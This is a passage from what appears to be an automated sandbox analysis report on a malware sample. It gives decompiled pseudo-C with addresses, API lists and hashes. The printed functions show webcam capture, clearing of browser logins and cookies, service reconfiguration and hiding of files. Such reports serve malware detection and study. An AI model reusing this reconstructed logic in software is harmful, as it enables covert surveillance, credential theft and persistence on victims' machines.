				char* _t142;
				signed int _t144;
				void* _t147;
				void* _t148;
				intOrPtr* _t149;

				_push(__edi);
				_t122 = _a8;
				_t127 = __ecx;
				_t24 = E0040278C(__ecx, _a8);
				_t78 = _t127;
				_t156 = _t24;
				if(_t24 == 0) {
					_push(__ebx);
					E00402868(_t78, __edx, _t139, 0);
					_t26 = E0040221D();
					_t75 = _a8;
					_a4 = _t26;
					_t117 =  *_t26;
					__eflags =  !_t117 - _t75;
					if( !_t117 <= _t75) {
						E00402884(_t127, _t139);
						asm("int3");
						_t140 = _t144;
						_push(_t127);
						_t28 = E00401F8B( &_v4);
						E00404182( &_v4,  &_v40, 4, 0xffffffff);
						_t147 = (_t144 & 0xfffffff8) - 0xc;
						E004020D6(_t75, _t147, _t117, __eflags, 0x472ec8);
						_t148 = _t147 - 0x18;
						E004020D6(_t75, _t148, _t117, __eflags,  &_v56);
						E0041A976( &_v72, _t117);
						_t149 = _t148 + 0x30;
						_t129 =  *_t28 - 0x3c;
						__eflags = _t129;
						if(__eflags == 0) {
							E00401E45( &_v48, _t117, _t140, __eflags, 0);
							_t36 = E0040245C();
							E00401F8B(E00401E45( &_v52, _t117, _t140, __eflags, 0));
							_t117 = _t36;
							_t131 = E00411235();
							__eflags = _t131;
							if(_t131 != 0) {
								 *0x470ad4 = E004114AA(_t131, "OpenCamera");
								 *0x470ad0 = E004114AA(_t131, "CloseCamera");
								_t46 = E004114AA(_t131, "GetFrame");
								_t117 = "FreeFrame";
								 *0x470ad8 = _t46;
								 *0x470acc = E004114AA(_t131, "FreeFrame");
								 *0x470aba = 1;
								E004020D6(_t75, _t149 - 0x18, "FreeFrame", __eflags, 0x472e30);
								_push(0x1b);
								goto L23;
							}
						} else {
							_t133 = _t129 - 1;
							__eflags = _t133;
							if(_t133 == 0) {
								__eflags =  *0x470a87;
								if(__eflags != 0) {
									goto L20;
								}
							} else {
								_t134 = _t133 - 1;
								__eflags = _t134;
								if(_t134 == 0) {
									 *0x470ad0();
									 *0x470a87 = 0;
								} else {
									_t135 = _t134 - 1;
									__eflags = _t135;
									if(_t135 == 0) {
										_t55 =  *0x470ad4();
										 *0x470a87 = _t55;
										__eflags = _t55;
										if(__eflags == 0) {
											goto L15;
										} else {
											L20:
											_t117 = E0043A3AC(_t50, E00401F8B(E00401E45( &_v48, _t117, _t140, __eflags, 0)));
											E004045E7(_a8, _t52, __eflags);
										}
									} else {
										_t136 = _t135 - 1;
										__eflags = _t136;
										if(_t136 == 0) {
											_t57 =  *0x470ad4();
											 *0x470a87 = _t57;
											__eflags = _t57;
											if(__eflags == 0) {
												L15:
												E004020D6(_t75, _t149 - 0x18, _t117, __eflags, 0x472e30);
												_push(0x41);
												L23:
												E00404A81(_a8, _t117, __eflags);
											} else {
												_t60 = E0043A3AC(_t58, E00401F8B(E00401E45( &_v48, _t117, _t140, __eflags, _t136)));
												 *_t149 = 0x3e8;
												Sleep(??);
												_t117 = _t60;
												E004045E7(_a8, _t60, __eflags);
												 *0x470ad0();
											}
										}
									}
								}
							}
						}
						_t21 =  &_v48; // 0x472e30
						E00401E6D(_t21, _t117);
						E00401FB8();
						E00401FB8();
						__eflags = 0;
						return 0;
					} else {
						_push(_t139);
						_t142 =  &(_t117[_t75]);
						__eflags = _t75;
						if(_t75 != 0) {
							_t64 = E004027C6(_t75, _t127, _t117, _t122, _t142, 0);
							__eflags = _t64;
							if(_t64 != 0) {
								_t66 = E0040220A(_t127);
								E004015A6(E0040220A(_t127) + _t75 * 2, _t66,  *_a8);
								E00401592(E0040220A(_t127), _t122, _t75);
								E00402837(_t142);
							}
						}
						_t63 = _t127;
						goto L7;
					}
				} else {
					_push(_a12);
					_t63 = E004034C6(__ebx, _t127, __edx, _t122 - E0040220A(_t78) >> 1, _t127, _t139, _t156, _t78, _t127, _t122 - E0040220A(_t78) >> 1);
					L7:
					return _t63;
				}
			}






































                    0x00404352
                    0x00404353
                    0x00404357
                    0x0040435a
                    0x0040435f
                    0x00404361
                    0x00404363
                    0x0040437e
                    0x00404381
                    0x00404388
                    0x0040438d
                    0x00404391
                    0x00404395
                    0x0040439b
                    0x0040439d
                    0x004043fb
                    0x00404400
                    0x00404402
                    0x0040440d
                    0x0040440e
                    0x00404421
                    0x00404426
                    0x00404430
                    0x00404435
                    0x0040443f
                    0x00404448
                    0x0040444d
                    0x00404450
                    0x00404450
                    0x00404453
                    0x00404533
                    0x0040453a
                    0x0040454e
                    0x00404553
                    0x0040455c
                    0x0040455e
                    0x00404560
                    0x00404573
                    0x00404584
                    0x0040458b
                    0x00404590
                    0x00404595
                    0x004045a4
                    0x004045ab
                    0x004045b7
                    0x004045bc
                    0x00000000
                    0x004045bc
                    0x00404459
                    0x00404459
                    0x00404459
                    0x0040445c
                    0x004044f8
                    0x004044ff
                    0x00000000
                    0x00000000
                    0x00404462
                    0x00404462
                    0x00404462
                    0x00404465
                    0x004044e6
                    0x004044ec
                    0x00404467
                    0x00404467
                    0x00404467
                    0x0040446a
                    0x004044d5
                    0x004044db
                    0x004044e0
                    0x004044e2
                    0x00000000
                    0x004044e4
                    0x00404505
                    0x00404521
                    0x00404523
                    0x00404523
                    0x0040446c
                    0x0040446c
                    0x0040446c
                    0x0040446f
                    0x00404475
                    0x0040447b
                    0x00404480
                    0x00404482
                    0x004044bf
                    0x004044c9
                    0x004044ce
                    0x004045be
                    0x004045c1
                    0x00404484
                    0x00404496
                    0x0040449d
                    0x004044a4
                    0x004044ad
                    0x004044af
                    0x004044b4
                    0x004044b4
                    0x00404482
                    0x0040446f
                    0x0040446a
                    0x00404465
                    0x0040445c
                    0x004045c6
                    0x004045ca
                    0x004045d3
                    0x004045db
                    0x004045e0
                    0x004045e6
                    0x0040439f
                    0x0040439f
                    0x004043a0
                    0x004043a3
                    0x004043a5
                    0x004043ac
                    0x004043b1
                    0x004043b3
                    0x004043bd
                    0x004043ce
                    0x004043e0
                    0x004043eb
                    0x004043eb
                    0x004043b3
                    0x004043f1
                    0x00000000
                    0x004043f3
                    0x00404365
                    0x00404365
                    0x00404377
                    0x004043f4
                    0x004043f6
                    0x004043f6

                    APIs
                      • Part of subcall function 00402884: std::_Xinvalid_argument.LIBCPMT ref: 00402889
                    • Sleep.KERNEL32(00000000,00409ABF), ref: 004044A4
                      • Part of subcall function 004045E7: __EH_prolog.LIBCMT ref: 004045EC
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prologSleepXinvalid_argumentstd::_
                    • String ID: 0.G$CloseCamera$FreeFrame$GetFrame$OpenCamera
                    • API String ID: 834325642-106669708
                    • Opcode ID: 500cdb838e30def03354b7fb84f69d778f12aaaac4c335bfd6e04aeec570f5d0
                    • Instruction ID: ecedd063232be1ac5acd44a52b85944b2f12cafd62aea4fc44177e9967f66efd
                    • Opcode Fuzzy Hash: 500cdb838e30def03354b7fb84f69d778f12aaaac4c335bfd6e04aeec570f5d0
                    • Instruction Fuzzy Hash: 6E51E571A04300ABC614FB769D5AA6E37959BD0714F00453FFA0A772E2DF7C8A45839E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004441FA Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 80%
                    			E004441FA(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				char _v48;
				void* __ecx;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t75;
				intOrPtr _t76;
				signed int _t79;
				signed int _t86;
				intOrPtr _t88;
				signed int _t99;
				void* _t101;
				void* _t103;
				void* _t108;
				signed int _t112;
				signed int _t113;
				signed int _t116;
				signed int _t123;
				signed int _t125;
				intOrPtr _t126;
				signed int _t128;
				intOrPtr _t130;
				signed int _t131;
				void* _t135;
				void* _t136;
				void* _t138;

				_t120 = __edx;
				_t97 = __ebx;
				_push(_t101);
				if(_a8 != 0) {
					_push(__esi);
					_push(__edi);
					_t123 = 0;
					_t67 = E0043F7BD( &_v8, 0, 0, _a8, 0x7fffffff);
					_t136 = _t135 + 0x14;
					__eflags = _t67;
					if(_t67 == 0) {
						L5:
						_t128 = E004443F4(_t101, _v8, 2);
						_pop(_t103);
						__eflags = _t128;
						if(_t128 == 0) {
							L11:
							E00445002(_t128);
							_t70 = _t123;
							goto L12;
						} else {
							_t71 = E0043F7BD(_t123, _t128, _v8, _a8, 0xffffffff);
							_t136 = _t136 + 0x14;
							__eflags = _t71;
							if(_t71 == 0) {
								_t123 = E0044357C(_t97, _t103, _t120, _a4, _t128);
								goto L11;
							} else {
								__eflags = _t71 - 0x16;
								if(_t71 == 0x16) {
									goto L13;
								} else {
									__eflags = _t71 - 0x22;
									if(_t71 != 0x22) {
										goto L11;
									} else {
										goto L13;
									}
								}
							}
						}
					} else {
						__eflags = _t67 - 0x16;
						if(_t67 == 0x16) {
							L13:
							_push(_t123);
							_push(_t123);
							_push(_t123);
							_push(_t123);
							E0043A5E8();
							asm("int3");
							E00433700(0x46c970, 0x1c);
							_t130 = _a4;
							_t75 = E004441FA(_t97, _t120, _t123, _t130, _t130, _a8);
							_t108 = _t123;
							_t125 = _t75;
							__eflags = _t125;
							if(_t125 != 0) {
								_t76 = E00446A95(_t97, _t108, _t120);
								_v40 = _t76;
								_v48 =  *((intOrPtr*)(_t76 + 0x4c));
								_t110 =  *((intOrPtr*)(_t76 + 0x48));
								_v44 =  *((intOrPtr*)(_t76 + 0x48));
								_v32 = 0;
								_t79 = E0043FEEB( *((intOrPtr*)(_t76 + 0x48)),  &_v32, 0, 0, _t125, 0,  &_v48);
								_t138 = _t136 + 0x18;
								__eflags = _t79;
								if(_t79 == 0) {
									L22:
									_t99 = E00444A38(_t110, _v32 + 4);
									__eflags = _t99;
									if(_t99 == 0) {
										goto L15;
									} else {
										_t20 = _t99 + 4; // 0x4
										_v36 = _t20;
										_t110 =  &_v48;
										_t125 = 0;
										_t86 = E0043FEEB( &_v48, 0, _t20, _v32, 0, 0xffffffff,  &_v48);
										_t138 = _t138 + 0x18;
										__eflags = _t86;
										if(_t86 == 0) {
											L29:
											_t126 = _v48;
											E00444189(4);
											_pop(_t112);
											_v8 = _v8 & 0x00000000;
											_t131 = _t130 + _t130;
											_t113 = _t112 | 0xffffffff;
											__eflags =  *(_t126 + 0x24 + _t131 * 8);
											if(__eflags != 0) {
												asm("lock xadd [edx], eax");
												if(__eflags == 0) {
													E00445002( *(_t126 + 0x24 + _t131 * 8));
													_pop(_t116);
													 *(_t126 + 0x24 + _t131 * 8) =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
													_t113 = _t116 | 0xffffffff;
													__eflags = _t113;
												}
											}
											_t88 = _v40;
											__eflags =  *(_t88 + 0x350) & 0x00000002;
											if(( *(_t88 + 0x350) & 0x00000002) == 0) {
												__eflags =  *0x46f9a4 & 0x00000001;
												if(( *0x46f9a4 & 0x00000001) == 0) {
													__eflags =  *(_t126 + 0x24 + _t131 * 8);
													if( *(_t126 + 0x24 + _t131 * 8) != 0) {
														asm("lock xadd [eax], ecx");
														__eflags = _t113 == 1;
														if(_t113 == 1) {
															E00445002( *(_t126 + 0x24 + _t131 * 8));
															_t51 = _t126 + 0x24 + _t131 * 8;
															 *_t51 =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
															__eflags =  *_t51;
														}
													}
												}
											}
											 *_t99 =  *((intOrPtr*)(_t126 + 0xc));
											 *(_t126 + 0x24 + _t131 * 8) = _t99;
											 *((intOrPtr*)(_t126 + 0x1c + _t131 * 8)) = _v36;
											_v8 = 0xfffffffe;
											E004443EB();
										} else {
											__eflags = _t86 - 0x16;
											if(_t86 == 0x16) {
												L26:
												_push(_t125);
												_push(_t125);
												_push(_t125);
												_push(_t125);
												_push(_t125);
												goto L20;
											} else {
												__eflags = _t86 - 0x22;
												if(_t86 != 0x22) {
													__eflags = _t86;
													if(_t86 == 0) {
														goto L29;
													} else {
														E00445002(_t99);
														goto L15;
													}
												} else {
													goto L26;
												}
											}
										}
									}
								} else {
									__eflags = _t79 - 0x16;
									if(_t79 == 0x16) {
										L19:
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										L20:
										_t79 = E0043A5E8();
									} else {
										__eflags = _t79 - 0x22;
										if(_t79 == 0x22) {
											goto L19;
										}
									}
									__eflags = _t79;
									if(_t79 != 0) {
										goto L15;
									} else {
										goto L22;
									}
								}
							} else {
								L15:
							}
							return E00433746();
						} else {
							__eflags = _t67 - 0x22;
							if(_t67 == 0x22) {
								goto L13;
							} else {
								goto L5;
							}
						}
					}
				} else {
					_t70 = E0044357C(__ebx, _t101, __edx, _a4, 0);
					L12:
					return _t70;
				}
			}


































                    0x004441fa
                    0x004441fa
                    0x004441ff
                    0x00444204
                    0x00444214
                    0x00444215
                    0x0044421e
                    0x00444226
                    0x0044422b
                    0x0044422e
                    0x00444230
                    0x0044423c
                    0x00444246
                    0x00444249
                    0x0044424a
                    0x0044424c
                    0x0044427d
                    0x0044427e
                    0x00444284
                    0x00000000
                    0x0044424e
                    0x00444258
                    0x0044425d
                    0x00444260
                    0x00444262
                    0x0044427b
                    0x00000000
                    0x00444264
                    0x00444264
                    0x00444267
                    0x00000000
                    0x00444269
                    0x00444269
                    0x0044426c
                    0x00000000
                    0x0044426e
                    0x00000000
                    0x0044426e
                    0x0044426c
                    0x00444267
                    0x00444262
                    0x00444232
                    0x00444232
                    0x00444235
                    0x0044428c
                    0x0044428c
                    0x0044428d
                    0x0044428e
                    0x0044428f
                    0x00444291
                    0x00444296
                    0x0044429e
                    0x004442a6
                    0x004442aa
                    0x004442b0
                    0x004442b1
                    0x004442b3
                    0x004442b5
                    0x004442be
                    0x004442c3
                    0x004442c9
                    0x004442cc
                    0x004442cf
                    0x004442d4
                    0x004442e3
                    0x004442e8
                    0x004442eb
                    0x004442ed
                    0x00444307
                    0x00444314
                    0x00444316
                    0x00444318
                    0x00000000
                    0x0044431a
                    0x0044431a
                    0x0044431d
                    0x00444320
                    0x0044432b
                    0x0044432e
                    0x00444333
                    0x00444336
                    0x00444338
                    0x0044435b
                    0x0044435b
                    0x00444360
                    0x00444365
                    0x00444366
                    0x0044436a
                    0x00444370
                    0x00444373
                    0x00444375
                    0x00444379
                    0x0044437d
                    0x00444383
                    0x00444388
                    0x00444389
                    0x0044438e
                    0x0044438e
                    0x0044438e
                    0x0044437d
                    0x00444391
                    0x00444394
                    0x0044439b
                    0x0044439d
                    0x004443a4
                    0x004443aa
                    0x004443ac
                    0x004443ae
                    0x004443b2
                    0x004443b3
                    0x004443b9
                    0x004443bf
                    0x004443bf
                    0x004443bf
                    0x004443bf
                    0x004443b3
                    0x004443ac
                    0x004443a4
                    0x004443c7
                    0x004443c9
                    0x004443d0
                    0x004443d4
                    0x004443db
                    0x0044433a
                    0x0044433a
                    0x0044433d
                    0x00444344
                    0x00444344
                    0x00444345
                    0x00444346
                    0x00444347
                    0x00444348
                    0x00000000
                    0x0044433f
                    0x0044433f
                    0x00444342
                    0x0044434b
                    0x0044434d
                    0x00000000
                    0x0044434f
                    0x00444350
                    0x00000000
                    0x00444355
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00444342
                    0x0044433d
                    0x00444338
                    0x004442ef
                    0x004442ef
                    0x004442f2
                    0x004442f9
                    0x004442f9
                    0x004442fa
                    0x004442fb
                    0x004442fc
                    0x004442fd
                    0x004442fe
                    0x004442fe
                    0x004442f4
                    0x004442f4
                    0x004442f7
                    0x00000000
                    0x00000000
                    0x004442f7
                    0x00444303
                    0x00444305
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00444305
                    0x004442b7
                    0x004442b7
                    0x004442b7
                    0x004443e7
                    0x00444237
                    0x00444237
                    0x0044423a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044423a
                    0x00444235
                    0x00444206
                    0x0044420b
                    0x00444288
                    0x0044428b
                    0x0044428b

                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: __cftoe
                    • String ID:
                    • API String ID: 4189289331-0
                    • Opcode ID: 1e01b658f374c474e9f8643c5383819788eb159efaecc8c22926f80f8221aa00
                    • Instruction ID: 8fe28a21c22037a225050a123006aa5e814484bf9f3f78946cda57ab9d9a3774
                    • Opcode Fuzzy Hash: 1e01b658f374c474e9f8643c5383819788eb159efaecc8c22926f80f8221aa00
                    • Instruction Fuzzy Hash: 2451EE72900505A7FF249F99CC42FAF77A8AF89774F20425FF81496292DB3DD900866C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00409C99 Relevance: 9.2, APIs: 6, Instructions: 163sleepCOMMON
                    Download Yara Rule
                    C-Code - Quality: 97%
                    			E00409C99(void* __ecx, char* __edx) {
				char _v1028;
				char _v1040;
				char _v1064;
				char _v1076;
				void* _v1088;
				void* _v1092;
				char _v1100;
				char _v1124;
				void* _v1132;
				char _v1136;
				void* _v1148;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t32;
				char* _t34;
				void* _t36;
				int _t40;
				void* _t47;
				int _t62;
				void* _t64;
				void* _t70;
				void* _t71;
				void* _t79;
				void* _t134;
				signed int _t136;
				signed int _t139;

				_t126 = __edx;
				_t139 = _t136 & 0xfffffff8;
				_t79 = __ecx;
				_push(_t130);
				_t134 = __ecx + 4;
				do {
					Sleep(0x1388);
					E00409BE8(_t79, _t126);
					_t126 = 0x46a8f0;
					if(E00406E2B(_t139) != 0) {
						if(E0040619C() == 0) {
							CreateDirectoryW(E00401EE4(0x4730b8), 0);
						}
						_t128 = _t79 + 0x60;
						_t32 = GetFileAttributesW(E00401EE4(_t79 + 0x60));
						_t142 = _t32 & 0x00000002;
						if((_t32 & 0x00000002) != 0) {
							SetFileAttributesW(E00401EE4(_t128), 0x80);
						}
						_t34 = E00401F8B(E00401E45(0x473298, _t126, _t134, _t142, 0x12));
						_t143 =  *_t34;
						if( *_t34 != 0) {
							E004020BF(_t79,  &_v1124);
							_t36 = E0040245C();
							E0040632B( &_v1028, E00401F8B(0x473280), _t36);
							_t40 = PathFileExistsW(E00401EE4(_t128));
							__eflags = _t40;
							if(_t40 != 0) {
								E004020BF(_t79,  &_v1100);
								E00401EE4(_t128);
								_t126 =  &_v1100;
								_t62 = E0041ADFE( &_v1100);
								__eflags = _t62;
								if(_t62 != 0) {
									_t64 = E0040245C();
									E00401FC2( &_v1136,  &_v1100, _t130, E0040644C(_t79,  &_v1028,  &_v1100,  &_v1076, E00401F8B( &_v1100), _t64));
									E00401FB8();
								}
								E00401FB8();
							}
							__eflags = E0040245C() + _t41;
							L00403356(E00402097(_t79,  &_v1076, _t126, _t134, __eflags, E00401EE4(_t134), E0040245C() + _t41));
							E00401FB8();
							_t47 = E0040245C();
							E0040644C(_t79,  &_v1040, _t126,  &_v1064, E00401F8B( &_v1136), _t47);
							_t126 = E00401EE4(_t128);
							E0041AE6B( &_v1076, _t51);
							E00401FB8();
							E00401FB8();
						} else {
							_t70 = E00401EE4(_t128);
							_t71 = E0040245C();
							_t132 = _t71;
							_t130 = _t71 + _t132;
							E00401EE4(_t134);
							_t126 = _t71 + _t132;
							E0041AD6A(_t71 + _t132, _t70, 1);
						}
						L004086CB(_t79, _t134, _t126, 0x46a8f0);
						if( *((char*)(E00401F8B(E00401E45(0x473298, _t126, _t134, _t143, 0x13)))) != 0) {
							SetFileAttributesW(E00401EE4(_t128), 6);
						}
					}
				} while ( *((char*)(_t79 + 0x49)) != 0);
				return 0;
			}






























                    0x00409c99
                    0x00409c9c
                    0x00409ca7
                    0x00409ca9
                    0x00409cab
                    0x00409cae
                    0x00409cb3
                    0x00409cbb
                    0x00409cc0
                    0x00409cce
                    0x00409ce0
                    0x00409cef
                    0x00409cef
                    0x00409cf5
                    0x00409d00
                    0x00409d06
                    0x00409d08
                    0x00409d17
                    0x00409d17
                    0x00409d2b
                    0x00409d30
                    0x00409d33
                    0x00409d65
                    0x00409d6f
                    0x00409d84
                    0x00409d91
                    0x00409d97
                    0x00409d99
                    0x00409d9f
                    0x00409da6
                    0x00409dab
                    0x00409db1
                    0x00409db6
                    0x00409db8
                    0x00409dbe
                    0x00409de1
                    0x00409dea
                    0x00409dea
                    0x00409df3
                    0x00409df3
                    0x00409dff
                    0x00409e18
                    0x00409e21
                    0x00409e2a
                    0x00409e43
                    0x00409e4f
                    0x00409e55
                    0x00409e5e
                    0x00409e67
                    0x00409d35
                    0x00409d39
                    0x00409d41
                    0x00409d46
                    0x00409d4a
                    0x00409d4c
                    0x00409d51
                    0x00409d55
                    0x00409d5b
                    0x00409e73
                    0x00409e8e
                    0x00409e9a
                    0x00409e9a
                    0x00409e8e
                    0x00409ea0
                    0x00409eb3

                    APIs
                    • Sleep.KERNEL32(00001388), ref: 00409CB3
                      • Part of subcall function 00409BE8: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409CC0), ref: 00409C1E
                      • Part of subcall function 00409BE8: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409CC0), ref: 00409C2D
                      • Part of subcall function 00409BE8: Sleep.KERNEL32(00002710,?,?,?,00409CC0), ref: 00409C5A
                      • Part of subcall function 00409BE8: CloseHandle.KERNEL32(00000000,?,?,?,00409CC0), ref: 00409C61
                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409CEF
                    • GetFileAttributesW.KERNEL32(00000000), ref: 00409D00
                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409D17
                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409D91
                      • Part of subcall function 0041ADFE: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409DB6), ref: 0041AE17
                    • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,0046A8F0,?,00000000,00000000,00000000,00000000,00000000), ref: 00409E9A
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                    • String ID:
                    • API String ID: 3795512280-0
                    • Opcode ID: 59506a914bbfcea490ed3023c6497aacaf04dca16843856057a0f918d3296b1b
                    • Instruction ID: a26b43d943647d041280ad137afe2d2b6888429955654135db8bde193f98b3d7
                    • Opcode Fuzzy Hash: 59506a914bbfcea490ed3023c6497aacaf04dca16843856057a0f918d3296b1b
                    • Instruction Fuzzy Hash: 35514D312043015BC714BB72D8A6ABF779A9F80308F04453FB946B72E3DE7D9D05869A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040B586 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 103sleepCOMMON
                    Download Yara Rule
                    C-Code - Quality: 85%
                    			E0040B586(void* __edi) {
				char _v5;
				char _v6;
				char _v7;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				intOrPtr _t18;
				void* _t36;
				intOrPtr _t40;
				char _t50;
				void* _t52;
				void* _t53;
				signed int _t54;
				signed int _t55;
				void* _t56;

				_t52 = __edi;
				_t55 = _t54 & 0xfffffff8;
				 *0x470b1a = 1;
				Sleep( *0x470b28);
				_v7 = 0;
				_t36 = 0;
				_v6 = 0;
				_v5 = 0;
				goto L1;
				do {
					do {
						L1:
						_t60 = _t36;
						if(_t36 == 0) {
							L2:
							_t36 = E0040B463(_t60);
						}
						_t61 = _t36;
						if(_t36 == 0) {
							_t36 = E0040B2B1(_t50, _t52, _t61);
						}
						_t62 = _v6;
						if(_v6 == 0) {
							_v6 = E0040B0AA(_t36, _t50, _t52, _t62);
						}
						_t63 = _v7;
						if(_v7 == 0) {
							_v7 = E0040B01B(_t50, _t52, _t63);
						}
						_t50 = _v5;
						_t64 = _t50;
						if(_t50 == 0) {
							_t50 = E0040AF8C(_t50, _t52, _t64);
							_v5 = _t50;
						}
						if(_t36 == 0 || _t36 == 0) {
							L16:
							Sleep(0x1388);
							_t18 = _v7;
							_t40 = _v6;
							_t50 = _v5;
						} else {
							_t18 = _v7;
							if(_t18 == 0 || _t50 == 0) {
								goto L16;
							} else {
								_t40 = _v6;
								if(_t40 == 0) {
									goto L16;
								}
							}
						}
						if(_t36 == 0) {
							goto L2;
						}
					} while (_t36 == 0 || _t18 == 0 || _t50 == 0);
					_t74 = _t40;
				} while (_t40 == 0);
				_t56 = _t55 - 0x18;
				E00402073(_t36, _t56, _t50, _t53, "\n[Cleared browsers logins and cookies.]\n");
				E0040B752(_t36, _t50, _t53, _t74);
				E00402073(_t36, _t56, _t50, _t53, "Cleared browsers logins and cookies.");
				_t57 = _t56 - 0x18;
				E00402073(_t36, _t56 - 0x18, _t50, _t53, "i");
				E0041A04A(_t36, _t52);
				E00402073(_t36, _t57 + 0x18, _t50, _t53, 0x464074);
				_push(0xaf);
				E00404A81(0x4734e8, _t50, _t74);
				if( *0x470b19 != 0) {
					E00412B5F(0x473238, E00401F8B(0x473238), "FR", 1);
				}
				 *0x470b1a = 0;
				return 0;
			}


















                    0x0040b586
                    0x0040b589
                    0x0040b594
                    0x0040b59b
                    0x0040b5a7
                    0x0040b5ab
                    0x0040b5ad
                    0x0040b5b3
                    0x0040b5b3
                    0x0040b5b7
                    0x0040b5b7
                    0x0040b5b7
                    0x0040b5b7
                    0x0040b5b9
                    0x0040b5bb
                    0x0040b5c0
                    0x0040b5c0
                    0x0040b5c2
                    0x0040b5c4
                    0x0040b5cb
                    0x0040b5cb
                    0x0040b5d1
                    0x0040b5d3
                    0x0040b5da
                    0x0040b5da
                    0x0040b5e2
                    0x0040b5e4
                    0x0040b5eb
                    0x0040b5eb
                    0x0040b5ef
                    0x0040b5f3
                    0x0040b5f5
                    0x0040b5fc
                    0x0040b5fe
                    0x0040b5fe
                    0x0040b604
                    0x0040b61e
                    0x0040b623
                    0x0040b629
                    0x0040b62d
                    0x0040b631
                    0x0040b60a
                    0x0040b60a
                    0x0040b610
                    0x00000000
                    0x0040b616
                    0x0040b616
                    0x0040b61c
                    0x00000000
                    0x00000000
                    0x0040b61c
                    0x0040b610
                    0x0040b637
                    0x00000000
                    0x00000000
                    0x0040b639
                    0x0040b651
                    0x0040b651
                    0x0040b659
                    0x0040b663
                    0x0040b668
                    0x0040b674
                    0x0040b679
                    0x0040b683
                    0x0040b688
                    0x0040b697
                    0x0040b69c
                    0x0040b6a6
                    0x0040b6b2
                    0x0040b6c7
                    0x0040b6cd
                    0x0040b6ce
                    0x0040b6db

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID: [Cleared browsers logins and cookies.]$82G$Cleared browsers logins and cookies.$4G
                    • API String ID: 3472027048-2766125209
                    • Opcode ID: 6edb077d68d4f3ae3194ad966572f3ddeabe56104e8ff8a515528542a4f313e5
                    • Instruction ID: b4021fb9e4edc30202d34e01d01bd8d1c2d2826e69326faececa9b35d7d9af25
                    • Opcode Fuzzy Hash: 6edb077d68d4f3ae3194ad966572f3ddeabe56104e8ff8a515528542a4f313e5
                    • Instruction Fuzzy Hash: D831860474C3806DDA116B7558667AB6F928EA3758F0844FFB8C4273C3DA7B490993AF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004197D3 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                    Download Yara Rule
                    C-Code - Quality: 76%
                    			E004197D3(signed char __ecx, char _a4) {
				signed char _v5;
				void* _t7;
				signed int _t11;
				void* _t17;
				short* _t21;
				signed int _t24;
				int _t25;
				void* _t28;
				void* _t31;

				_push(__ecx);
				_t21 = 0;
				_v5 = __ecx;
				_t7 = OpenSCManagerW(0, 0, 2);
				_t24 =  &_a4;
				_t31 = _t7;
				_t28 = OpenServiceW(_t31, E00401EE4(_t24), 2);
				if(_t28 != 0) {
					_t25 = _t24 | 0xffffffff;
					_t11 = _v5 & 0x000000ff;
					if(_t11 == 0) {
						_push(4);
						goto L8;
					} else {
						_t17 = _t11 - 1;
						if(_t17 == 0) {
							_push(2);
							goto L8;
						} else {
							if(_t17 == 1) {
								_push(3);
								L8:
								_pop(_t25);
							}
						}
					}
					_t21 = _t21 & 0xffffff00 | ChangeServiceConfigW(_t28, 0xffffffff, _t25, 0xffffffff, _t21, _t21, _t21, _t21, _t21, _t21, _t21) != 0x00000000;
					CloseServiceHandle(_t31);
					CloseServiceHandle(_t28);
				} else {
					CloseServiceHandle(_t31);
				}
				E00401EE9();
				return _t21;
			}












                    0x004197d6
                    0x004197dc
                    0x004197de
                    0x004197e3
                    0x004197eb
                    0x004197ee
                    0x004197fd
                    0x00419801
                    0x00419810
                    0x00419813
                    0x00419815
                    0x00419829
                    0x00000000
                    0x00419817
                    0x00419817
                    0x0041981a
                    0x00419825
                    0x00000000
                    0x0041981c
                    0x0041981f
